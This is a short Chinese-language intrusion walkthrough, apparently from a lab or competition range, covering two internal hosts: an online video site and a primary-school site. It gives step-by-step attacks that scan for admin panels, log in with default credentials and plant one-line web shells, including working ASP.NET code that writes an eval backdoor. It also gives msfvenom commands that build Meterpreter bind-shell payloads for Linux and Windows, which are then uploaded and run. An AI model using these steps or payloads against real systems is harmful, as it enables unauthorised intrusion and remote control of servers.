(一)广诚在线视频(10.100.0.99)
1、使用御剑后台扫描
2、发现安装说明,使用火狐浏览器打开并修复文字编码
3、找到了后台默认密码和后台地址,登录后台
4、进入后台,找到工具,进入模块管理,在dafault/Home/index.tql写入一句话木马
5、使用中国蚁剑连接,添加相应数据
6、制作msf正向木马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=14358 -f elf > linuxshell25
7、使用中国蚁剑上传msf正向木马
8、上传后运行木马
9、使用msf连接
10、成功连接
(二)、广诚小学(10.100.0.49)
1、进入后台登录界面,administrator,administrator
2、在专题管理提交新专题,在具体内容输入如下代码
<%
System. IO.StreamWriter ow=new System. IO.StreamWriter(Server.MapPath("xx.aspx"),false);
ow.Write("<%@ Page Language=\"Jscript\"%\><%eval(Request. Item[\"chopper\"],\"unsafe\");%\>");
ow.Close();
%>
3、提交新专题后,点击新提交的专题
4、使用中国蚁剑连接
5、制作msf正向木马
msfvenom -p windows/meterpreter/bind_tcp LPORT=14358 -f exe -o flash25.exe
6、上传木马到 C:/WINDOWS/Temp/ 目录下
7、运行木马
8、使用msf连接
9、成功连接